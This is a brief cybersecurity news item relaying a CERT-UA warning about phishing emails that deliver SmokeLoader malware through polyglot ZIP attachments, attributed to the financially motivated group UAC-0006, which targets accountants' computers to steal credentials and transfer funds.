"CERT-UA Warns of an Ongoing SmokeLoader Campaign"

The Computer Emergency Response Team of Ukraine (CERT-UA) warns of an ongoing phishing campaign aimed at distributing the SmokeLoader malware in the form of a polyglot file. Threat actors are sending emails with the subject line "bill/payment" and a ZIP archive attachment from compromised accounts. The JavaScript involved in the attack uses PowerShell to download and run an executable that launches the SmokeLoader malware. SmokeLoader serves as a loader for other malware. Upon execution, it injects malicious code into the running explorer process (explorer.exe) and downloads another payload. CERT-UA linked the campaign to the financially motivated threat actor UAC-0006 who has been active since at least 2013. The threat actors focus on compromising accountants' computers, which are used to support financial activities such as remote banking system access. They also steal credentials and initiate unauthorized fund transfers. This article continues to discuss researchers' findings regarding the phishing campaign distributing the SmokeLoader malware.

Security Affairs reports "CERT-UA Warns of an Ongoing SmokeLoader Campaign"